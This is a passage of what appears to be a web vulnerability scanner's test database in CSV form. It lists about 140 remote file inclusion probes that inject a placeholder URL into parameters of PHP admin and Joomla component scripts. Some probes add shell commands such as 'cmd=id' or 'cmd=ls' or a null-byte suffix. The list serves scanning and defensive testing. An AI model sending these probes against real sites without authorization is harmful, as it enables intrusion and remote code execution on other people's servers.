RFI list.","","" "004070","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004071","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/ST_countries.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004072","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/ST_platforms.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004073","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/addentry.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004074","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/addentry.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004075","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/addons/archive/archive.php?adminfolder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004076","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/admin.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004077","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/admin.php?site_url=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004078","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/admin_forgotten_password.php?root_folder_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004079","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/admin_news_bot.php?root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004080","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004081","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004082","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/admin_users.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004083","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/auth.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004084","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/auth.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004085","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/auth/secure.php?cfgProgDir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004086","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/autoprompter.php?CONFIG[BASE_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004087","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/bin/patch.php?INSTALL_FOLDER=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004088","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/catagory.php?language=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004089","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/OLE/PPS.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004090","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/OLE/PPS/File.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004091","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/OLE/PPS/Root.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004092","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004093","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004094","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004095","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004096","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004097","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004098","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/code/index.php?load_page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004099","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/comment.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004100","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/common-menu.php?CONF[local_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004101","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004102","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/config_settings.tpl.php?include_path=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004103","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/directory.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004104","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/doeditconfig.php?thispath=../includes&config[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004105","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/frontpage_right.php?loadadminpage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004106","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/header.php?loc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004107","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/inc/add.php?format_menue=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004108","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/inc/change_action.php?format_menue=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004109","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/include/common.php?commonIncludePath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004110","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/include/header.php?repertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004111","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/include/header.php?repertoire=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004112","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/include/lib.module.php?mod_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004113","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/includes/admin_header.php?level=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004114","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/includes/admin_header.php?level=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004115","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/includes/author_panel_header.php?level=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004116","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/includes/author_panel_header.php?level=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004117","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/includes/header.php?bypass_installed=1&secure_page_path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004118","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/includes/spaw/spaw_control.class.php?spaw_root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004119","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/index.php?path_to_script=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004120","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/index.php?pg=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004121","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/index.php?xtrphome=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004122","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/index_sitios.php?_VIEW=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004123","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004124","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/login.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004125","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/news.admin.php?path_to_script=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004126","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/news.php?language=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004127","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004128","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/sendmsg.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004129","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/setup/level2.php?dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004130","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/system/config/conf-activation.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004131","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/system/include.php?skindir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004132","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/system/include.php?start=1&skindir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004133","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/system/menu/item.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004134","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/system/modules/conf_modules.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004135","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/templates/template_thumbnail.php?thumb_template=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004136","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/testing/tests/0004_init_urls.php?init_path=@RFIURL?&","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004137","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/themes.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004138","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/tools/utf8conversion/index.php?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004139","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin/user_user.php?language=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004140","https://gist.github.com/mubix/5d269c686584875015a2","c","/admincp/auth/checklogin.php?cfgProgDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004141","https://gist.github.com/mubix/5d269c686584875015a2","c","/admincp/auth/secure.php?cfgProgDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004142","https://gist.github.com/mubix/5d269c686584875015a2","c","/adminhead.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004143","https://gist.github.com/mubix/5d269c686584875015a2","c","/admini/admin.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004144","https://gist.github.com/mubix/5d269c686584875015a2","c","/admini/index.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004145","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/admin.php?site_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004146","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004147","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004148","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004149","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004150","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004151","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004152","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004153","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004154","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004155","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004156","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004157","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004158","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004159","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004160","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004161","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004162","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004163","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004164","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004165","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004166","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004167","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004168","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004169","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004170","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004171","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004172","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004173","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004174","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004175","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004176","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004177","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004178","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004179","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004180","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004181","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004182","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004183","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004184","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004185","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004186","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004187","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004188","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004189","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004190","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004191","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004192","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_jreactions/langset.php?comPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004193","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004194","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004195","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004196","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004197","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004198","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004199","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004200","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004201","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004202","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004203","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004204","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004205","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004206","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004207","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004208","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004209","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=@RFIURL","GET","PHP 